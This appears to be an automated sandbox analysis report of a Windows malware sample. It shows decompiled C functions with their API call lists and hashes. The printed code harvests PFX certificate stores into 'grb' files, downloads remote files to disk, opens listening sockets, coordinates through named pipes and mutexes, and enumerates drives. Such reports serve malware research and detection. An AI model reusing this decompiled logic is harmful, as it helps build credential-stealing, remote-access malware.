    0x004097c9
    0x00000000
    0x0040976c
    0x00409773
    0x0040977a
    0x0040977f
    0x00409781
    0x00409781
    0x0040978c
    0x00409791
    0x00000000
    0x00409791

    APIs
    • GetComputerNameW.KERNEL32(?,00000206), ref: 004097DA
    • lstrcpyW.KERNEL32(?,unknown), ref: 004097ED
    • GetTickCount.KERNEL32 ref: 004097F3
    • wnsprintfW.SHLWAPI ref: 00409812
    • CharLowerBuffA.USER32(00000000,00000031,?,?,?,?,00000001,?,00000002), ref: 00409858
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: BuffCharComputerCountLowerNameTicklstrcpywnsprintf
    • String ID: 1$unknown
    • API String ID: 2565877886-2453001258
    • Opcode ID: 160e39a0b512e880e07b37484d8ce43ac87c353f8e6dbb69bf94d177fefe40e4
    • Instruction ID: 829a1b6f517f72b74bb117326a77847a7f13e8fc37162dfe65f6b294f105fcfa
    • Opcode Fuzzy Hash: 160e39a0b512e880e07b37484d8ce43ac87c353f8e6dbb69bf94d177fefe40e4
    • Instruction Fuzzy Hash: D7419972910108EADF24EBA8CE49ADE77B9EB05304F1041BAE505E7292D7789E41DB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E0040643F(void* _a4, long* _a8) {
    				char _v5;
    				signed int _v12;
    				char _v16;
    				char* _v20;
    				char _v24;
    				char* _v28;
    				char _v48;
    				char _v1564;
    				char _v1568;
    				void* __ebx;
    				void* __esi;
    				signed int _t56;
    				intOrPtr _t63;
    				int _t65;
    				intOrPtr _t66;
    				char* _t69;
    				long _t70;
    				intOrPtr _t71;
    				signed int _t79;
    				long* _t81;
    				signed int _t82;
    				char* _t89;
    				void* _t91;
    				signed int _t92;
    				signed int _t93;
    				void* _t95;
    
    				_t79 = 0;
    				_t91 =  *0x412bcc(2, 2, 0);
    				if(_t91 != 0xffffffff) {
    					_v12 = 0;
    					 *0x412bfc(_t91, 0x4004747f, 0, 0,  &_v1568, 0x5f0,  &_v12, 0, 0);
    					 *0x412bb8(_t91);
    					_t82 = 0x4c;
    					_t56 = _v12 / _t82;
    					_t92 = 0;
    					_v5 = 1;
    					_v16 = 0;
    					_v20 = 0;
    					_v12 = _t56;
    					if(_t56 <= 0) {
    						L23:
    						return _t56 & 0xffffff00 | _v12 != _t79;
    					}
    					_t89 =  &_v1564;
    					do {
    						if(( *(_t89 - 4) & 0x00000001) == 0) {
    							goto L17;
    						}
    						_t56 = E00406114(_t89);
    						if(_t56 != 0) {
    							goto L17;
    						}
    						if(_v5 != _t79) {
    							_t66 =  *0x412a8c; // 0x416000
    							_t18 = _t66 + 0x24; // 0xe001b
    							_t84 =  *_t18 & 0x000000ff;
    							_t19 = _t66 + 0x26; // 0x400000e
    							_t21 = _t66 + 0x12c; // 0xe0147
    							_t56 = E00409418( &_v24,  *_t19 & 0x000000ff, _t92, ( *_t18 & 0x000000ff) + _t21);
    							_t92 = _t56;
    							if(_t92 != 0) {
    								_t69 = E0040D0D5(_t56, _v24);
    								_t92 = 0;
    								_v28 = _t69;
    								if(_t69 != 0) {
    									_t70 = GetTickCount();
    									_t81 = _a8;
    									 *_t81 = _t70;
    									_t71 =  *0x412a8c; // 0x416000
    									_t26 = _t71 + 0x28; // 0xd96c0400
    									_t93 =  *_t26 & 0x0000ffff;
    									if(InternetOpenUrlA(_a4, _v28, 0, 0, 0x84043300, 0) != 0) {
    										_t92 = E004060CC(_t84,  &_v16, _t93, _t73);
    									} else {
    										_t92 = 0;
    									}
    									 *_t81 = GetTickCount() -  *_t81;
    									E0040CF40(_v28);
    								}
    								_t56 = E0040CF40(_v24);
    							}
    							_v5 = 0;
    							_t79 = 0;
    						}
    						if(_t92 == _t79) {
    							L22:
    							goto L23;
    						} else {
    							_t63 =  *0x412a64; // 0x246f5a8
    							_t65 = wnsprintfA( &_v48, 0x14,  *(_t63 + 0x6c),  *(_t89 + 4) & 0x000000ff,  *(_t89 + 5) & 0x000000ff,  *(_t89 + 6) & 0x000000ff,  *(_t89 + 7) & 0x000000ff);
    							_t95 = _t95 + 0x1c;
    							_t56 = E00408C0D( &_v48, _t65, _v16, _t92, _t79, _t79, _t79);
    							if(_t56 != 0) {
    								_v12 = _t79;
    								L20:
    								if(_t92 != _t79) {
    									_t56 = E0040CF40(_v16);
    								}
    								goto L22;
    							}
    						}
    						L17:
    						_v20 =  &(_v20[1]);
    						_t56 = _v20;
    						_t89 = _t89 + 0x4c;
    					} while (_t56 < _v12);
    					goto L20;
    				}
    				return 0;
    			}
    0x0040644a
    0x00406457
    0x0040645c
    0x0040647f
    0x00406482
    0x00406489
    0x00406496
    0x00406497
    0x00406499
    0x0040649b
    0x0040649f
    0x004064a2
    0x004064a5
    0x004064aa
    0x004065d3
    0x00000000
    0x004065d6
    0x004064b1
    0x004064b7
    0x004064bb
    0x00000000
    0x00000000
    0x004064c3
    0x004064ca
    0x00000000
    0x00000000
    0x004064d3
    0x004064d9
    0x004064de
    0x004064de
    0x004064e2
    0x004064e6
    0x004064f1
    0x004064f6
    0x004064fa
    0x004064ff
    0x00406504
    0x00406506
    0x0040650b
    0x0040650d
    0x00406513
    0x00406516
    0x00406518
    0x0040651d
    0x0040651d
    0x00406539
    0x00406549
    0x0040653b
    0x0040653b
    0x0040653b
    0x00406556
    0x00406558
    0x00406558
    0x00406560
    0x00406560
    0x00406565
    0x00406569
    0x00406569
    0x0040656d
    0x004065d2
    0x00000000
    0x0040656f
    0x00406583
    0x00406591
    0x00406597
    0x004065a6
    0x004065ad
    0x004065c3
    0x004065c6
    0x004065c8
    0x004065cd
    0x004065cd
    0x00000000
    0x004065c8
    0x004065ad
    0x004065af
    0x004065af
    0x004065b2
    0x004065b5
    0x004065b8
    0x00000000
    0x004065c1
    0x00000000

    APIs
    • socket.WS2_32(00000002,00000002,00000000), ref: 00406451
    • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,?,00000000,00000000), ref: 00406482
    • closesocket.WS2_32(00000000), ref: 00406489
    • GetTickCount.KERNEL32 ref: 0040650D
    • InternetOpenUrlA.WININET(?,?,00000000,00000000,84043300,00000000), ref: 00406531
    • GetTickCount.KERNEL32 ref: 0040654B
    • wnsprintfA.SHLWAPI ref: 00406591
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CountTick$InternetIoctlOpenclosesocketsocketwnsprintf
    • String ID:
    • API String ID: 1843894412-0
    • Opcode ID: 1e79e01054fa3da93f0d4baabcb9cabae2166530d30fadfd7f449d2b2f9c5141
    • Instruction ID: a03ef770ef415d6105fd1c409c0fc46fc2fe7ffa6a8b7aab6adad1149690444a
    • Opcode Fuzzy Hash: 1e79e01054fa3da93f0d4baabcb9cabae2166530d30fadfd7f449d2b2f9c5141
    • Instruction Fuzzy Hash: CF51A4B1800129BFDB119FA4DC85AEFBBB8AF05314F018176F901F31D5C6389E648B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 31%
    			E00408464() {
    				intOrPtr _v12;
    				short* _v16;
    				signed int _v20;
    				char _v24;
    				intOrPtr _v28;
    				char _v32;
    				short _v46;
    				char _v48;
    				short _v86;
    				char _v88;
    				signed int _v348;
    				signed int _v352;
    				void* __edi;
    				short _t39;
    				signed int _t40;
    				signed int _t42;
    				void* _t47;
    				intOrPtr* _t52;
    				intOrPtr _t62;
    				void* _t67;
    				signed int _t68;
    				signed int _t69;
    				signed int _t70;
    				void* _t72;
    
    				_v20 = 0;
    				_v16 = 0x41297c;
    				_v12 = E00408418;
    				E0040CFFE( &_v88,  &_v88, 0, 0x26);
    				_t39 = 2;
    				_v88 = _t39;
    				_t68 = 0x9c40;
    				while(1) {
    					_t40 = E0040DF05();
    					asm("rol dx, 0x8");
    					_v86 = _t40 % 0x7531 + 0x2710;
    					_t42 = E0040E2D4( &_v88, 0x10, 0x7fffffff);
    					if(_t42 != 0xffffffff) {
    						break;
    					}
    					_t68 = _t68 - 1;
    					if(_t68 > 0) {
    						continue;
    					} else {
    						_t69 = _t68 | _t42;
    						L4:
    						if(_t69 != 0xffffffff) {
    							_push( &_v24);
    							_push( &_v48);
    							_push(_t69);
    							_v24 = 0x10;
    							if( *0x412bf0() == 0) {
    								asm("rol ax, 0x8");
    								_v20 = _t69;
    								 *0x41297c = _v46;
    							}
    						}
    						_v32 = 0;
    						_v28 = 0xf4240;
    						while(WaitForSingleObject( *0x412974, 0x64) != 0) {
    							_v348 = _v20;
    							_v352 = 1;
    							_t47 =  *0x412c00(0,  &_v352, 0, 0,  &_v32);
    							if(_t47 == 0xffffffff) {
    								break;
    							}
    							if(_t47 <= 0) {
    								continue;
    							}
    							L19:
    							while(_v352 != 0) {
    								_v352 = _v352 - 1;
    								_t62 =  *((intOrPtr*)(_t72 + _v352 * 4 - 0x158));
    								_t70 = 0;
    								_t52 =  &_v20;
    								while(_t62 !=  *_t52) {
    									_t70 = _t70 + 1;
    									_t52 = _t52 + 0xc;
    									if(_t70 < 1) {
    										continue;
    									}
    									goto L19;
    								}
    								_t71 = _t70 * 0xc;
    								_t67 =  *0x412bd8( *((intOrPtr*)(_t72 + _t70 * 0xc - 0x10)), 0, 0);
    								if(_t67 != 0xffffffff) {
    									 *0x412970 =  *0x412970 + 1;
    									if(E0040A04D(_t62,  *((intOrPtr*)(_t72 + _t71 - 8)), _t67) == 0) {
    										 *0x412bb8(_t67);
    										 *0x412970 =  *0x412970 - 1;
    									}
    								}
    							}
    						}
    						 *0x412bb8(_v20);
    						 *0x412970 =  *0x412970 - 1;
    						_push(0);
    						RtlExitUserThread();
    						return 0;
    					}
    				}
    				_t69 = _t42;
    				goto L4;
    			}
    0x00408479
    0x0040847c
    0x00408483
    0x0040848a
    0x00408491
    0x00408492
    0x00408496
    0x0040849b
    0x0040849b
    0x004084b9
    0x004084bd
    0x004084c1
    0x004084c9
    0x00000000
    0x00000000
    0x004084cb
    0x004084ce
    0x00000000
    0x004084d0
    0x004084d0
    0x004084d2
    0x004084d5
    0x004084da
    0x004084de
    0x004084df
    0x004084e0
    0x004084ef
    0x004084f5
    0x004084f9
    0x004084fc
    0x004084fc
    0x004084ef
    0x00408502
    0x00408505
    0x004085b1
    0x00408518
    0x0040852c
    0x00408536
    0x0040853f
    0x00000000
    0x00000000
    0x00408547
    0x00000000
    0x00000000
    0x00000000
    0x004085a9
    0x0040854b
    0x00408557
    0x0040855e
    0x00408560
    0x00408563
    0x00408567
    0x00408568
    0x0040856e
    0x00000000
    0x00000000
    0x00000000
    0x00408570
    0x00408572
    0x00408581
    0x00408586
    0x00408588
    0x0040859a
    0x0040859d
    0x004085a3
    0x004085a3
    0x0040859a
    0x00408586
    0x004085a9
    0x004085ca
    0x004085d0
    0x004085d6
    0x004085d7
    0x004085e3
    0x004085e3
    0x004084ce
    0x00408511
    0x00000000

    APIs
      • Part of subcall function 0040DF05: GetTickCount.KERNEL32 ref: 0040DF05
      • Part of subcall function 0040E2D4: socket.WS2_32(?,00000001,00000006), ref: 0040E2DD
      • Part of subcall function 0040E2D4: bind.WS2_32(00000000,?,?), ref: 0040E2F0
      • Part of subcall function 0040E2D4: listen.WS2_32(00000000,?), ref: 0040E2FF
      • Part of subcall function 0040E2D4: closesocket.WS2_32(00000000), ref: 0040E30A
    • getsockname.WS2_32(00000000,?,?), ref: 004084E7
    • select.WS2_32(00000000,?,00000000,00000000,?), ref: 00408536
    • accept.WS2_32(?,00000000,00000000), ref: 0040857B
    • closesocket.WS2_32(00000000), ref: 0040859D
    • WaitForSingleObject.KERNEL32(00000064,00000010,7FFFFFFF,?,00000000,00000026), ref: 004085B9
    • closesocket.WS2_32(?), ref: 004085CA
    • RtlExitUserThread.NTDLL(00000000), ref: 004085D7
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: closesocket$CountExitObjectSingleThreadTickUserWaitacceptbindgetsocknamelistenselectsocket
    • String ID:
    • API String ID: 1067960629-0
    • Opcode ID: 03b24a7a3d50f7f04edbaac7a9506a0ee0ec1024029288ae2d1811a1eba8969e
    • Instruction ID: 5ceb0ee77c47aa702db4f66acc73852a285a66162c5f4fbb8dace1754a8f4f7d
    • Opcode Fuzzy Hash: 03b24a7a3d50f7f04edbaac7a9506a0ee0ec1024029288ae2d1811a1eba8969e
    • Instruction Fuzzy Hash: B641D371900119AEDB109FA8DE889EE7778FF44314F10453BE962F22E0EBB84D558F99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040D913(void* __edi, void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
    				char _v5;
    				long _v12;
    				struct _OVERLAPPED* _v16;
    				long _v20;
    				long _t32;
    				void* _t37;
    				void* _t39;
    
    				_v5 = 0;
    				_t39 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
    				if(_t39 == 0xffffffff) {
    					L15:
    					return _v5;
    				}
    				_t37 = RtlAllocateHeap( *0x413e5c, 8, 0x1004);
    				if(_t37 == 0) {
    					L13:
    					CloseHandle(_t39);
    					if(_v5 == 0) {
    						E0040DD3C(_a8);
    					}
    					goto L15;
    				}
    				_v16 = 0;
    				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
    					if(InternetReadFile(_a4, _t37, 0x1000,  &_v12) == 0) {
    						break;
    					}
    					if(_v12 == 0) {
    						FlushFileBuffers(_t39);
    						_v5 = 1;
    						break;
    					}
    					if(WriteFile(_t39, _t37, _v12,  &_v20, 0) == 0) {
    						break;
    					}
    					_t32 = _v12;
    					if(_t32 != _v20) {
    						break;
    					}
    					_v16 = _v16 + _t32;
    					if(_v16 <= _a12) {
    						continue;
    					}
    					break;
    				}
    				E0040CF40(_t37);
    				goto L13;
    			}

    0x0040d930
    0x0040d939
    0x0040d93e
    0x0040d9e2
    0x0040d9e8
    0x0040d9e8
    0x0040d958
    0x0040d95c
    0x0040d9cd
    0x0040d9ce
    0x0040d9d8
    0x0040d9dd
    0x0040d9dd
    0x00000000
    0x0040d9d8
    0x0040d95e
    0x0040d961
    0x0040d98c
    0x00000000
    0x00000000
    0x0040d991
    0x0040d9bd
    0x0040d9c3
    0x00000000
    0x0040d9c3
    0x0040d9a5
    0x00000000
    0x00000000
    0x0040d9a7
    0x0040d9ad
    0x00000000
    0x00000000
    0x0040d9af
    0x0040d9b8
    0x00000000
    0x00000000
    0x00000000
    0x0040d9ba
    0x0040d9c8
    0x00000000

    APIs
    • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040D933
    • RtlAllocateHeap.NTDLL(00000008,00001004,?), ref: 0040D952
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D96A
    • InternetReadFile.WININET(?,00000000,00001000,?), ref: 0040D984
    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040D99D
    • FlushFileBuffers.KERNEL32(00000000), ref: 0040D9BD
    • CloseHandle.KERNEL32(00000000), ref: 0040D9CE
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$AllocateBuffersCloseCreateFlushHandleHeapInternetObjectReadSingleWaitWrite
    • String ID:
    • API String ID: 4284787851-0
    • Opcode ID: eb18521934f989b2b97c3d633ef98fc08f2800bd459c79f4585bcc506700614b
    • Instruction ID: 6c4d087222c7b84599c6def3267490e2be1d22d4e95e2927a8098ada68969aa7
    • Opcode Fuzzy Hash: eb18521934f989b2b97c3d633ef98fc08f2800bd459c79f4585bcc506700614b
    • Instruction Fuzzy Hash: F42157B1900248BBDF219BE4DC84AEF7B78AB00310F008476F951B2290D7798D598B28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E0040FB22(void* __ecx, void* __edx) {
    				char _v5;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				void* _t20;
    				void* _t29;
    				WCHAR** _t40;
    
    				_t40 = 0x403914;
    				_v24 = 2;
    				do {
    					_t20 = OpenMutexW(0x1f0001, 0,  *_t40);
    					if(_t20 == 0) {
    						goto L13;
    					}
    					CloseHandle(_t20);
    					E0040F9F9( *_t40, 0xb,  &_v12);
    					_t3 =  &_v16; // 0x405c43
    					E0040F9F9( *_t40, 0xc, _t3);
    					E0040F9F9( *_t40, 0xd,  &_v20);
    					E0040F9F9( *_t40, 3, 0);
    					_v5 = 0;
    					while(1) {
    						_t29 = OpenMutexW(0x1f0001, 0,  *_t40);
    						if(_t29 == 0) {
    							break;
    						}
    						CloseHandle(_t29);
    						Sleep(0x3e8);
    						_v5 = _v5 + 1;
    						if(_v5 < 0xa) {
    							continue;
    						}
    						L12:
    						E0040CF40(_v12);
    						_t16 =  &_v16; // 0x405c43
    						E0040CF40( *_t16);
    						_t20 = E0040CF40(_v20);
    						goto L13;
    					}
    					if(_v12 != 0) {
    						E0040DD3C(_v12);
    					}
    					if(_v16 != 0) {
    						_t12 =  &_v16; // 0x405c43
    						E0040DD3C( *_t12);
    					}
    					if(_v20 != 0) {
    						E0040DD3C(_v20);
    					}
    					goto L12;
    					L13:
    					_t40 =  &(_t40[1]);
    					_t18 =  &_v24;
    					 *_t18 = _v24 - 1;
    				} while ( *_t18 != 0);
    				return _t20;
    			}

    0x0040fb2b
    0x0040fb30
    0x0040fb3e
    0x0040fb42
    0x0040fb4a
    0x00000000
    0x00000000
    0x0040fb51
    0x0040fb5f
    0x0040fb64
    0x0040fb6c
    0x0040fb79
    0x0040fb83
    0x0040fb88
    0x0040fb8b
    0x0040fb8f
    0x0040fb97
    0x00000000
    0x00000000
    0x0040fb9a
    0x0040fba5
    0x0040fbab
    0x0040fbb2
    0x00000000
    0x00000000
    0x0040fbdd
    0x0040fbe0
    0x0040fbe5
    0x0040fbe8
    0x0040fbf0
    0x00000000
    0x0040fbf0
    0x0040fbb9
    0x0040fbbe
    0x0040fbbe
    0x0040fbc6
    0x0040fbc8
    0x0040fbcb
    0x0040fbcb
    0x0040fbd3
    0x0040fbd8
    0x0040fbd8
    0x00000000
    0x0040fbf5
    0x0040fbf5
    0x0040fbf8
    0x0040fbf8
    0x0040fbf8
    0x0040fc05

    APIs
    • OpenMutexW.KERNEL32(001F0001,00000000,00403914,?,?,00000000), ref: 0040FB42
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040FB51
      • Part of subcall function 0040F9F9: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,\\.\pipe\,00000012,001F0001,00403914,00000000), ref: 0040FA72
      • Part of subcall function 0040F9F9: SetNamedPipeHandleState.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040FA8D
      • Part of subcall function 0040F9F9: WriteFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 0040FAAC
      • Part of subcall function 0040F9F9: ReadFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 0040FAC2
      • Part of subcall function 0040F9F9: CloseHandle.KERNEL32(00000000), ref: 0040FAE3
      • Part of subcall function 0040F9F9: WaitNamedPipeW.KERNEL32(?,000000FF), ref: 0040FA5A
      • Part of subcall function 0040F9F9: ReadFile.KERNEL32(00000000,00000000,?,00000008,00000000), ref: 0040FB05
    • OpenMutexW.KERNEL32(001F0001,00000000,00403914,00403914,00000003,00000000,00403914,0000000D,?,00403914,0000000C,C\@,00403914,0000000B,?), ref: 0040FB8F
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040FB9A
    • Sleep.KERNEL32(000003E8,?,?,00000000), ref: 0040FBA5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FileHandle$Close$MutexNamedOpenPipeRead$CreateSleepStateWaitWrite
    • String ID: C\@
    • API String ID: 2066843493-3981424963
    • Opcode ID: 73d04ec097e37e16b5aa3180bd21f71067241e5b6cffa7d7e8f4aee1e8c76210
    • Instruction ID: 7f631a189950b2c8a89bda6831585f21ea3ff56f9cc767dc00ffa2bb5b7e7ccb
    • Opcode Fuzzy Hash: 73d04ec097e37e16b5aa3180bd21f71067241e5b6cffa7d7e8f4aee1e8c76210
    • Instruction Fuzzy Hash: BF218E71900109BBDF22AFE5DC85EAEBB79AF00344F10447BF240B10A1DB795A599B59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E004068AD(void* __eax, void* __edi, intOrPtr _a4) {
    				int _t10;
    				void* _t11;
    				intOrPtr _t12;
    				intOrPtr* _t23;
    				int _t24;
    				void* _t26;
    				void* _t28;
    				void* _t29;
    				void* _t30;
    				void _t31;
    
    				_t28 = __edi;
    				_t29 = __eax;
    				if(__eax != 0) {
    					L8:
    					_t26 = 0;
    					if(IsBadHugeReadPtr(_t29, 0x14) != 0) {
    						L16:
    						_t10 = IsBadHugeReadPtr(_t29, 0x14);
    						if(_t10 != 0 ||  *((intOrPtr*)(_t29 + 0xc)) == _t10) {
    							L19:
    							_t11 = 0;
    							goto L20;
    						} else {
    							_t11 = _t29;
    							L20:
    							return _t11;
    						}
    					} else {
    						goto L9;
    					}
    					while(1) {
    						L9:
    						_t12 =  *((intOrPtr*)(_t29 + 0xc));
    						if(_t12 == 0) {
    							break;
    						}
    						if(IsBadHugeReadPtr(_t12 + _t28, 2) == 0) {
    							_push(_a4);
    							_push( *((intOrPtr*)(_t29 + 0xc)) + _t28);
    							_t26 = 0;
    							if( *0x412cc8() == 0) {
    								goto L16;
    							}
    							L14:
    							_t29 = _t29 + 0x14;
    							if(IsBadHugeReadPtr(_t29, 0x14) == 0) {
    								continue;
    							}
    							break;
    						}
    						_t26 = 1;
    						goto L14;
    					}
    					if(_t26 != 0) {
    						goto L19;
    					}
    					goto L16;
    				}
    				if(IsBadHugeReadPtr(__edi, 4) != 0 ||  *__edi != 0x5a4d) {
    					L12:
    					return 0;
    				} else {
    					_t23 =  *((intOrPtr*)(__edi + 0x3c)) + __edi;
    					if( *_t23 != 0x4550) {
    						goto L12;
    					}
    					_t30 = _t23 + 0x80;
    					_t24 = IsBadHugeReadPtr(_t30, 8);
    					if(_t24 != 0 ||  *((intOrPtr*)(_t30 + 4)) == _t24) {
    						goto L12;
    					} else {
    						_t31 =  *_t30;
    						if(_t31 == 0) {
    							goto L12;
    						}
    						_t29 = __edi + _t31;
    						goto L8;
    					}
    				}
    			}

    0x004068ad
    0x004068ae
    0x004068b2
    0x004068f8
    0x004068fc
    0x00406906
    0x00406950
    0x00406953
    0x0040695b
    0x00406966
    0x00406966
    0x00000000
    0x00406962
    0x00406962
    0x00406968
    0x00000000
    0x00406968
    0x00000000
    0x00000000
    0x00000000
    0x00406908
    0x00406908
    0x00406908
    0x0040690d
    0x00000000
    0x00000000
    0x0040691c
    0x00406929
    0x0040692f
    0x00406930
    0x0040693a
    0x00000000
    0x00000000
    0x0040693c
    0x0040693e
    0x0040694a
    0x00000000
    0x00000000
    0x00000000
    0x0040694a
    0x0040691e
    0x00000000
    0x0040691e
    0x0040694e
    0x00000000
    0x00000000
    0x00000000
    0x0040694e
    0x004068bf
    0x00406922
    0x00000000
    0x004068cb
    0x004068ce
    0x004068d6
    0x00000000
    0x00000000
    0x004068d8
    0x004068e1
    0x004068e9
    0x00000000
    0x004068f0
    0x004068f0
    0x004068f4
    0x00000000
    0x00000000
    0x004068f6
    0x00000000
    0x004068f6
    0x004068e9

    APIs
    • IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 004068B7
    • IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 004068E1
    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 004068FE
    • IsBadHugeReadPtr.KERNEL32(?,00000002), ref: 00406914
    • lstrcmpi.KERNEL32(?,?), ref: 00406932
    • IsBadHugeReadPtr.KERNEL32(-00000014,00000014), ref: 00406942
    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 00406953
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: HugeRead$lstrcmpi
    • String ID:
    • API String ID: 1912838836-0
    • Opcode ID: 1b837c6eecaa347648f46ebfec34324a128b16db92c33cbc6c2541ba812dd3ca
    • Instruction ID: b7ed42011e205c698965e4bacc3207c643d0c74aaed3fc9a788e58e487abcfc0
    • Opcode Fuzzy Hash: 1b837c6eecaa347648f46ebfec34324a128b16db92c33cbc6c2541ba812dd3ca
    • Instruction Fuzzy Hash: F42181B17417129BDB304B249D04BA72794AF11B41B0A803AE982F7AD0E778D9308769
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00403F35(void* __ecx, void* __edx) {
    				intOrPtr _t19;
    				intOrPtr _t25;
    				void* _t36;
    				intOrPtr _t37;
    				void* _t39;
    				void* _t41;
    				void* _t42;
    				void* _t45;
    				intOrPtr* _t46;
    				void* _t48;
    				void* _t50;
    
    				_t41 = __edx;
    				_t39 = __ecx;
    				_t48 = _t50 - 0x6c;
    				_t37 =  *((intOrPtr*)(_t48 + 0x78));
    				_t46 =  *((intOrPtr*)(_t48 + 0x74));
    				_t19 =  *0x412b44(_t46, _t37,  *((intOrPtr*)(_t48 + 0x7c)), _t42, _t45, _t36);
    				 *((intOrPtr*)(_t48 + 0x7c)) = _t19;
    				if(_t19 != 0 && _t46 != 0 &&  *_t46 != 0 &&  *((intOrPtr*)(_t46 + 4)) != 0) {
    					GetSystemTime(_t48 + 0x5c);
    					_t25 =  *0x412a64; // 0x246f5a8
    					wnsprintfW(_t48 - 0x6c, 0x63,  *(_t25 + 0x174), L"grb",  *(_t48 + 0x62) & 0x0000ffff,  *(_t48 + 0x5e) & 0x0000ffff,  *(_t48 + 0x5c) & 0x0000ffff);
    					if(E00410DB9(_t39, _t41, 3, 0, _t48 - 0x6c,  *((intOrPtr*)(_t46 + 4)),  *_t46) == 0) {
    						L7:
    						 *((intOrPtr*)(_t48 + 0x7c)) = 0;
    					} else {
    						if(_t37 != 0) {
    							lstrcatW(_t48 - 0x6c, L".txt");
    							if(E00410DB9(_t37, _t41, 3, 0, _t48 - 0x6c, _t37, E0040D3D8(_t37) + _t32) == 0) {
    								goto L7;
    							}
    						}
    					}
    				}
    				return  *((intOrPtr*)(_t48 + 0x7c));
    			}

    0x00403f35
    0x00403f35
    0x00403f36
    0x00403f41
    0x00403f45
    0x00403f4e
    0x00403f56
    0x00403f5b
    0x00403f7a
    0x00403f8f
    0x00403fa5
    0x00403fc1
    0x00403ff1
    0x00403ff1
    0x00403fc3
    0x00403fc5
    0x00403fd0
    0x00403fef
    0x00000000
    0x00000000
    0x00403fef
    0x00403fc5
    0x00403fc1
    0x00403ffe

    APIs
    • PFXImportCertStore.CRYPT32(?,?,?), ref: 00403F4E
    • GetSystemTime.KERNEL32(?), ref: 00403F7A
    • wnsprintfW.SHLWAPI ref: 00403FA5
    • lstrcatW.KERNEL32(?,.txt), ref: 00403FD0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CertImportStoreSystemTimelstrcatwnsprintf
    • String ID: .txt$grb
    • API String ID: 1380901484-2795990106
    • Opcode ID: 430c4c4357b61008cf5982c5ab9a1afba0251044aaaca01c74cc1ba15b42ee2e
    • Instruction ID: 3f18609f751c16ec15fda1963a1a9fb989c7ad19787406847e1524753717746f
    • Opcode Fuzzy Hash: 430c4c4357b61008cf5982c5ab9a1afba0251044aaaca01c74cc1ba15b42ee2e
    • Instruction Fuzzy Hash: 7521AC72900248AEDB309FA9DC45DEBB7BCEF48701F108427BD64E2191E2799A54DB24
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E004042F5(intOrPtr* _a4) {
    				short _v14;
    				short _v16;
    				short _v18;
    				short _v20;
    				long _v24;
    				short _t23;
    				short _t24;
    				int _t27;
    				signed char _t33;
    				intOrPtr* _t42;
    
    				SetThreadPriority(GetCurrentThread(), 0xfffffff1);
    				_t42 = _a4;
    				while(WaitForSingleObject( *(_t42 + 4), 0x2710) != 0) {
    					if( *0x4126e0 != 0) {
    						_v24 = GetLogicalDrives();
    						_t33 = 2;
    						do {
    							if((_v24 & 1 << _t33) == 0) {
    								goto L7;
    							} else {
    								_v20 = (_t33 & 0x000000ff) + 0x41;
    								_t23 = 0x3a;
    								_v18 = _t23;
    								_t24 = 0x5c;
    								_v16 = _t24;
    								_v14 = 0;
    								_t27 = GetDriveTypeW( &_v20);
    								if(_t27 == 3 || _t27 == 2) {
    									E004040B8( &_v20, _t42);
    									if(WaitForSingleObject( *(_t42 + 4), 0x2710) != 0) {
    										goto L7;
    									}
    								} else {
    									goto L7;
    								}
    							}
    							goto L9;
    							L7:
    							_t33 = _t33 + 1;
    						} while (_t33 < 0x20);
    					}
    				}
    				L9:
    				 *_t42 =  *_t42 - 1;
    				_push(0);
    				return RtlExitUserThread();
    			}

    0x0040430a
    0x00404310
    0x00404397
    0x00404321
    0x00404329
    0x0040432d
    0x0040432f
    0x0040433c
    0x00000000
    0x0040433e
    0x00404348
    0x0040434d
    0x0040434e
    0x00404355
    0x00404356
    0x0040435d
    0x00404367
    0x00404370
    0x0040437d
    0x0040438e
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00404370
    0x00000000
    0x00404390
    0x00404390
    0x00404392
    0x0040432f
    0x00404321
